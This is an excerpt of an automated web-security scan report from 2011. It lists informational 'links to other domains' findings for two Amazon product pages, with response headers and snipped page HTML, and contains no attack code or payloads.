<a href="http://www.amazon.com/Terrible-Thing-Happened-children-witnessed/dp/1557987017/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_1557987017" ><img src="http://ecx.images-amazon.com/images/I/5149K3WJ6FL._SL75_SS50_.jpg" width="50" alt="A Terrible Thing Happened - A story for children who have witnessed violence or trauma" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Why-Does-He-That-Controlling/dp/0425191656/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_0425191656" ><img src="http://ecx.images-amazon.com/images/I/51KP97slJ7L._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Why Does He Do That?: Inside the Minds of Angry and Controlling Men" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/When-Dad-Hurts-Mom-Witnessing/dp/0425200310/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_0425200310" ><img src="http://ecx.images-amazon.com/images/I/51ORZtvZaBL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="When Dad Hurts Mom: Helping Your Children Heal the Wounds of Witnessing Abuse" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="text-align:center; padding-bottom:px;"><img src="http://g-ecx.images-amazon.com/images/G/01/gateway/iab/advertisement-sm-head._V192575712_.gif" border="0" alt="Ad" /></div>
<iframe id="cachebust_43448"
name="cachebust_78966"
src="http://ace.advertising.com/site=739494/bnum=85665492/size=728090/tags=1/optn=1;ord=75418?"
title="Ad"
frameborder ="0"
scrolling ="no"
marginheight ="0"
marginwidth ="0"
topmargin ="0"
leftmargin ="0"
allowtransparency="true"
width ="730"
height ="92"
><a href="http://www.amazon.com/grocery-breakfast-foods-snacks-organic/b/?ie=UTF8&node=16310101" target="_blank"><img border="0" src="http://g-ecx.images-amazon.com/images/G/01/advertising/banners/grocery_728x90._V192205351_.gif" /></a>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&nodeId=518316">
...[SNIP]...
<td>


                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" /> Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?

    <b>
...[SNIP]...
<a href="/ref=footer_logo/188-3368164-3583051"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

20.548. http://www.amazon.com/dp/0814410960 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/dp/0814410960

Issue detail

The page was loaded from a URL containing a query string:

http://www.amazon.com/dp/0814410960?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=0814410960&adid=1E43GGA9XAJKCAEXAPNZ&

The response contains the following links to other domains:

http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml
http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://ecx.images-amazon.com/images/I/41VzeG+q0CL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/41VzeG+q0CL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://ecx.images-amazon.com/images/I/512RttCMV1L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg
http://ecx.images-amazon.com/images/I/512RttCMV1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg
http://ecx.images-amazon.com/images/I/51DHWOul20L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51F1Xkl8lkL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/51SlYPTRa2L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51hNllGN8uL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51hNllGN8uL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://ecx.images-amazon.com/images/I/61RRhCgjqAL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/61RRhCgjqAL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16._V212310439_.png
http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif
http://g-ecx.images-amazon.com/images/G/01/kindle/cascade/read-first-chapter-free._V201174422_.png
http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif
http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif
http://www.amazon.ca/
http://www.amazon.cn/
http://www.amazon.de/
http://www.amazon.fr/
http://www.amazon.it/
http://www.audible.com/
http://www.dpreview.com/
http://www.endless.com/
http://www.fabric.com/
http://www.imdb.com/
http://www.shopbop.com/welcome
http://www.smallparts.com/
http://www.warehousedeals.com/
http://www.woot.com/
http://www.zappos.com/
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5791285623.css._V173906657_.css
http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css
http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:05:30 GMT
Server: Server
x-amz-id-1: 0V1X9WNQCM47PDADFQGC
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: SKWOpw071+vUvE/zvz84QekiVG202hXgMiv2MgQFljVkajAJe9OwpyfODLjeHTmR
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=176-7210136-6598218; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=y3NkdEGeLcNmXCUiBl72zia0IgOUlzJisM6ejtj6++wAzjFW+0MbDLrBrMTYId5ScAAIGSpPr8ov4wvfMrz16qkoExEE846LElBHdCDq1wJ5G3PyH/8+t8ULEiTMRJzZ+/UmohvS0s1wbtQLhB5tRJaj+v9Qvdikv5wA8Z+9BSaQuNwa25tYVL3brZaSaxoPnkAsz7sFby/Vm3IEdAyCOCgmDlA7LSKWp7BGexnTvAm3XJETeqxNVJ4XDLyzD9mn489zuGO7Hr1Q5jDtdTkD7MsDhmN6H6NA+BAMoVhXzdj8ywD6RaU+CKSyhgSibHDJfiAf99mXgDVIui4kc0MR8MKRTBSKmuzQBaMCl0Pf98laS7P8B1wibfy99GA8Gxn4ZYxd9IYn+0IOEpAUVtWvSy3VhH2tV4F6FYuFOflVaV1k+o8nZAdjmsVsH/6mMkOtJfcsZt8CR0o=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:05:31 2011 GMT
Content-Length: 398021

<html>
<head>

<style type="text/css">
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/512RttCMV1L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="bottomLeft">
<img src="http://g-ecx.images-amazon.com/images/G/01/kindle/cascade/read-first-chapter-free._V201174422_.png" id="kindleReaderSampleButton" style="cursor:pointer"/>
</td>
...[SNIP]...
<a href="https://www.amazon.com/gp/tradein/add-to-cart.html/ref=trade_new_dp_trade_btn?ie=UTF8&asin=0814410960"><img src="http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif" width="84" align="absmiddle" height="17" border="0" /></a>
...[SNIP]...
<a href="/gp/reader/0814410960/ref=sib_dp_pt#reader-link" onclick="if (typeof(SitbReader) != 'undefined') { SitbReader.LightboxActions.openReader('sib_dp_pt'); return false; }"><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/512RttCMV1L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" id="prodImage" width="300" height="300" onMouseOver="sitb_showLayer('bookpopover'); return false;" onMouseOut="sitb_doHide('bookpopover'); return false;" border="0" alt="Raising Freethinkers: A Practical Guide for Parenting Beyond Belief" onmouseover="" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Raising-Freethinkers-Practical-Parenting-Beyond/dp/0814410960/ref=pd_bxgy_b_img_a"><img src="http://ecx.images-amazon.com/images/I/512RttCMV1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="75" alt="Raising Freethinkers: A Practical Guide for Parenting Beyond Belief" id="bxgy_img_a" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Parenting-Beyond-Belief-Raising-Religion/dp/0814474268/ref=pd_bxgy_b_img_b"><img src="http://ecx.images-amazon.com/images/I/41VzeG%2Bq0CL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Parenting Beyond Belief: On Raising Ethical, Caring Kids Without Religion" id="bxgy_img_b" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Maybe-Yes-No-Guide-Skeptics/dp/0879756071/ref=pd_bxgy_b_img_c"><img src="http://ecx.images-amazon.com/images/I/51SlYPTRa2L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Maybe Yes, Maybe No: A Guide for Young Skeptics" id="bxgy_img_c" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41VzeG%2Bq0CL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51SlYPTRa2L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/61RRhCgjqAL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51hNllGN8uL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51F1Xkl8lkL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51DHWOul20L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading…" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="s9DpEntity" id="s9DpEntity" style="height: 200px;"><img style='padding-left: 130px; padding-top: 20px;' src='http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif' alt='loading' /><noscript>
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/512RttCMV1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="50" alt="Raising Freethinkers: A Practical Guide for Parenting Beyond Belief" height="50" border="0" /></td>
...[SNIP]...
<a href="http://www.amazon.com/Parenting-Beyond-Belief-Raising-Religion/dp/0814474268/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_0814474268" ><img src="http://ecx.images-amazon.com/images/I/41VzeG%2Bq0CL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Parenting Beyond Belief: On Raising Ethical, Caring Kids Without Religion" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/One-World-Many-Religions-Worship/dp/0679839305/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_0679839305" ><img src="http://ecx.images-amazon.com/images/I/51hNllGN8uL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="One World, Many Religions: The Ways We Worship" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Our-Family-Tree-Evolution-Story/dp/0152017720/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_0152017720" ><img src="http://ecx.images-amazon.com/images/I/61RRhCgjqAL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Our Family Tree: An Evolution Story" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&nodeId=518316">
...[SNIP]...
<td>


                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" /> Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?

    <b>
...[SNIP]...
<a href="/ref=footer_logo/176-7210136-6598218"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

20.549. http://www.amazon.com/dp/B000EFAO1G previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/dp/B000EFAO1G

Issue detail

The page was loaded from a URL containing a query string:

http://www.amazon.com/dp/B000EFAO1G?tag=parenthoodcom-20&camp=211493&creative=379969&linkCode=op1&creativeASIN=B000EFAO1G&adid=0GZGV3PX406SYA9DGF7Q&

The response contains the following links to other domains:

http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml
http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://ecx.images-amazon.com/images/I/31Y8BHTJ6FL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/419XADDZEQL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/41BjBfz6r8L._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/41CAA69047L._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/41IOZx3OE0L._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/41V+eXjhmOL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/41dEc0Pyy-L._SL75_AA30_.jpg
http://ecx.images-amazon.com/images/I/41qLz9kHAnL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/41qahKV5tbL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/41sJRFASbxL._SL500_AA300_.jpg
http://ecx.images-amazon.com/images/I/41sJRFASbxL._SL500_SS75_.jpg
http://ecx.images-amazon.com/images/I/41sJRFASbxL._SL500_SY90_.jpg
http://ecx.images-amazon.com/images/I/41sJRFASbxL._SL75_AA30_.jpg
http://ecx.images-amazon.com/images/I/41whOSISqRL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/518SMLBsPdL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/519XS1AS1QL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/51SED5J6B4L._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/51t69WdVNkL._SL500_SS100_.jpg
http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16._V212310439_.png
http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif
http://g-ecx.images-amazon.com/images/G/01/img10/x-site/winter-post-holiday/75/save-50_75._SS75_V205558317_.gif
http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif
http://rd.a9.com/srv/redirect/?info=ABej2w1aPwDZBEnjVVkoh0mPlMMBYHOZTFpf75GuVpeWdEXzB2oDKaiJkimNiMuG6M-J8H5ZMCgsqN7UL3KCKtP0cvkwXg.sRj2tPBi4exzMceg-.9m-e-scZdaorr0S5I.EuUzTdnpl5vrmP1cZEybD4F.zKV-q8V4BWajEf68aQyDtXzSNsSfKBLufSvawizCdcoPL9IchprMxZj.1VA7yx8l7Uzm5ikmSFDZ.YhYfDBxY0mWDLjFAk.FS3gU-CpvSqXmdNl3YXK0xzl12-5lj6vDlq92Gi39tGsoTU0cFiDjYDZZ703oifUOnNNDuaPsydk-1VqSZh5r4cP.6QwJS8pO5hRUEVG6ziXm.YcO0d4qqHOV2Ig26v6EALjzaNSLvFJazWEdN78eslW5REfjLW521tJF8hqhAhp6RPlT-LyfgQw9T0F-KKZtShTisyWpDcedIWnBSjll56xuAfXa-KxFKswPWoxjvt-FjevSlnN354zAU82Gi6K5u9I1tSw__&awt=1&s=
